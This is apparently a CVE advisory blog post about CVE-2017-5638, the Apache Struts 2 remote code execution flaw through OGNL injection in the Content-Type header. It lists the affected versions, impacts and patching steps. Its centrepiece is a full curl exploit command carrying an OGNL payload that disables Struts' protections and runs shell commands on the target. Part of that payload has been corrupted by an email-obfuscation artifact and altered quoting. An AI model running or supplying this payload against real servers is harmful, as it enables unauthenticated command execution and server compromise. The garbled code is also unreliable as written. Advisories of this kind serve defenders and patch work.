Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. The exploit works by sending a maliciously crafted `Content-Type` HTTP header to a server processing file uploads. If the header value is invalid, the parser attempts to generate an error message. However, it incorrectly interprets the header’s value using Object-Graph Navigation Language (OGNL) expressions. An attacker can embed OGNL code within the `Content-Type` header itself. When the parser fails and triggers the error flow, it evaluates the attacker’s OGNL payload. Since OGNL expressions can execute arbitrary system commands on the server, this vulnerability allows unauthenticated remote attackers to achieve full command execution with the same privileges as the Struts application server, simply by manipulating a single HTTP header in a request.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical

date: 2017-03-07

Prediction: Patch Available

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target-host.com/struts2-endpoint`

How Exploit:

Malicious HTTP Request

Crafted Content-Type Header

OGNL Expression Injection

Arbitrary Command Execution

Protection from this CVE

Apply Official Patch

Upgrade Struts Version

Use Input Validation

Web Application Firewall

Impact:

Full Server Compromise

Data Theft

Service Disruption

Arbitrary Code Execution

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top